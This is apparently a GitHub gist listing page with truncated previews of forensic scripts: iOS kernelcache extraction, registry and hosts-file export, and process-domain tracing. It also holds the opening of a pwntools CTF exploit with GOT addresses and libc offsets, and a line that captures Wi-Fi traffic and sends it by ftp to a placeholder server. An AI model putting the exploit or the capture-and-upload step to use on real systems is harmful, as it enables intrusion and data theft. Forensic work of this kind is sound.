shenyuanv
shenyuanv
/ files_info_tmp.sh
Last active
October 19, 2019 12:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /var/profile | |
| find /var/ -type f -exec md5 {} \; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ipsw=$(find . -name "*.ipsw") | |
| for f in $ipsw;do | |
| unzip -o $f "kernelcache.*" -d $f.d | |
| done | |
| kernels=$(find . -name "kernelcache.*" -not -name "*.dec") | |
| for k in $kernels;do | |
| offset=$(LANG=C grep -obUaP "\xff\xcf\xfa\xed" $k | head -n1 | cut -d':' -f1) | |
| ./lzssdec -o $offset < $k > $k.dec | |
| echo $offset |
shenyuanv
/ linux_save.sh
Created
March 30, 2018 14:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # ------------------------------------------------------------ | |
| # -- Setup parameters | |
| # ------------------------------------------------------------ | |
| if [ -z $1 ]; then | |
| echo "usage: $0 <dir_name>" | |
| exit; | |
| fi |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| setlocal | |
| set BackupFolder=C:\Temp | |
| if not exist "%BackupFolder%" md "%BackupFolder%" | |
| for %%a in (HKLM HKCU HKCR HKU HKCC) do ( | |
| echo Exporting %%a to %BackupFolder%\%%a.reg ... | |
| reg.exe export "%%a" "%BackupFolder%\%%a.reg" /y | |
| ) | |
| echo Exporting hosts file ... |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "C:\Program Files\Wireshark\dumpcap.exe" -i "Wi-Fi" -a duration:60 -w ./test.pcap | |
| ftp -s:test.pcap <SERVERDOMAIN.COM> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import os | |
| import zipfile | |
| from shutil import copyfile | |
| #Process list | |
| #PCAP | |
| #local.host | |
| base_dir = "./base" | |
| pcap_path = base_dir + "/all.pcap" |
shenyuanv
/ zecops_tools.sh
Last active
January 31, 2018 09:27
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # ------------------------------------------------------------ | |
| # -- Setup parameters | |
| # ------------------------------------------------------------ | |
| if [ -z $1 ]; then | |
| echo "usage: $0 <dir_name>" | |
| exit; | |
| fi |
shenyuanv
/ Get_Suspects.ps1
Last active
November 6, 2017 02:31
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-StapSuspects(){ | |
| <# | |
| .SYNOPSIS | |
| Dump process binary which connect to specific domain by SystemTap | |
| .DESCRIPTION | |
| Dump process binary which connect to specific domain by SystemTap | |
| .PARAMETER RemoteHostName | |
| Domain list you want to check |
shenyuanv
/ western_tokyo_swap.py
Last active
September 10, 2017 08:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import time | |
| atoi_got = 0x601050 | |
| puts_got = 0x601018 | |
| sleep_got = 0x601060 | |
| setvbuf_got = 0x601048 | |
| exit_got = 0x601058 | |
| setvbuf_offset = 0x6FE70 | |
| sleep_offset = 0xCC230 |
NewerOlder